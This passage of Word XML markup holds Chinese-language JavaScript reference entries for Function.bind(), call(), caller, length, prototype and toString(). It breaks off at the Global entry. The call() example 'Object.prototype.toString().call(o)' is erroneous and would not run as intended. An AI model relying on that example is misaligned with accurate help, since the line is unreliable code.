      <w:r>
        <w:t>表示数组中的元素个数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不推荐使用该属性，赞成使用</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在新的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中，永远不要使用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="667" w:name="Function_bind__"/>
      <w:r>
        <w:t>Function.bind()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="667"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个作为方法调用的函数</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function.bind(o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>function.bind(o,args...)</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要绑定到函数上的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>args...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要绑定到函数上的零个或多个参数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新函数。该函数会当做</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来调用，并向它传入</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回一个新函数，该函数会当做对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来调用。传递给该函数的参数由两部分组成，一部分是传递给</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:t>数组指定的参数，剩下的是传给这个新函数的所有值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>假设</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数，我们像下面这样调用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>g=f.bind(o,1,2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这样，</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>就一个新函数了。调用</w:t>
      </w:r>
      <w:r>
        <w:t>g(3)</w:t>
      </w:r>
      <w:r>
        <w:t>等价于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.call(o,1,2,3);</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Function.apply()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Function.call()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.4</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="668" w:name="Function_call__"/>
      <w:r>
        <w:t>Function.call()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="668"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将函数作为对象的方法调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>function.call(thisobj,args...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>的对象。在函数体中，</w:t>
      </w:r>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
      <w:r>
        <w:t>是关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值。如果这个参数为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，则使用全局对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>args...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>任意多个参数，它们会作为</w:t>
      </w:r>
      <w:r>
        <w:t>参数传递给</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值。</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如果调用该函数的对象不是函数，则抛出该异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>将指定的函数</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>作为对象</w:t>
      </w:r>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
      <w:r>
        <w:t>的方法来调用，并传入参数列表中</w:t>
      </w:r>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
      <w:r>
        <w:t>之后的参数。返回的是调用</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值。在函数体内，关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指代</w:t>
      </w:r>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
      <w:r>
        <w:t>对象，如果</w:t>
      </w:r>
      <w:r>
        <w:t>thisobj</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，则使用全局对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想用数组来指定传递给函数的参数，请使用</w:t>
      </w:r>
      <w:r>
        <w:t>Function.apply()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将默认的</w:t>
      </w:r>
      <w:r>
        <w:t>Object.toString()</w:t>
      </w:r>
      <w:r>
        <w:t>应用在一个对象上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以便覆盖该对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。注意没传参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.toString().call(o);</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Function.apply()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="669" w:name="Function_caller__"/>
      <w:r>
        <w:t>Function.caller()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="669"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已弃用；在严格模式下未定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用当前函数的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>function.caller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的早期版本中，</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:t>属性是对调用当前函数的函数的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果函数是在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序</w:t>
      </w:r>
      <w:r>
        <w:t>的全局作用域中调用的，则</w:t>
      </w:r>
      <w:r>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。该属性只能在函数内部使用。（即，只有在执行函数时，才定义</w:t>
      </w:r>
      <w:r>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:t>属性。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Function.caller</w:t>
      </w:r>
      <w:r>
        <w:t>属性不属于</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准，在遵守该标准的实现中，该属性不是必需的。不应该再使用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="670" w:name="Function_length__"/>
      <w:r>
        <w:t>Function.length()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="670"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>声明的参数的个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>function.length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定定义函数时所声明的形参的个数。实际调用函数时，传入的参数个数可以比函数的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性多，也可以比它少。不要将</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性混淆，后者指定的是实际传递给函数的参数个数。示例请阅读</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments.length</w:t>
      </w:r>
      <w:r>
        <w:t>参考页。</w:t>
      </w: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Arguments.length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="671" w:name="Function_prototype__"/>
      <w:r>
        <w:t>Function.prototype()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="671"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象类的原型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>function.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性会在函数作为构造函数时使用。它指代作为整个对象类</w:t>
      </w:r>
      <w:r>
        <w:t>的原型对象。用构造函数创建的任何对象都会继承</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>对象引用的对象的所有属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数、</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的类定义，请阅读第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章中的完整讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="672" w:name="Function_toString__"/>
      <w:r>
        <w:t>Function.toString()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="672"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将函数转换成字符串</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function.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示函数的字符串。</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如果调用该函数的对象不是函数，则抛出该异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法能将函数转换为字符串，但其功能与具体实现相关。在大部分实现</w:t>
      </w:r>
      <w:r>
        <w:t>中，比如</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中的实现，该方法返回的字符串是有效的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>包含关键字</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>、参数列表和函数体的完整代码等。在这些实现中，</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的输出是全局</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的有效输入。然而，该规范并不需要这一行为，因此要避免依赖该方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="673" w:name="Global"/>
      <w:r>
        <w:t>Global</w:t>
      </w:r>
      <w:bookmarkEnd w:id="673"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>全局对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对象</w:t>
      </w:r>
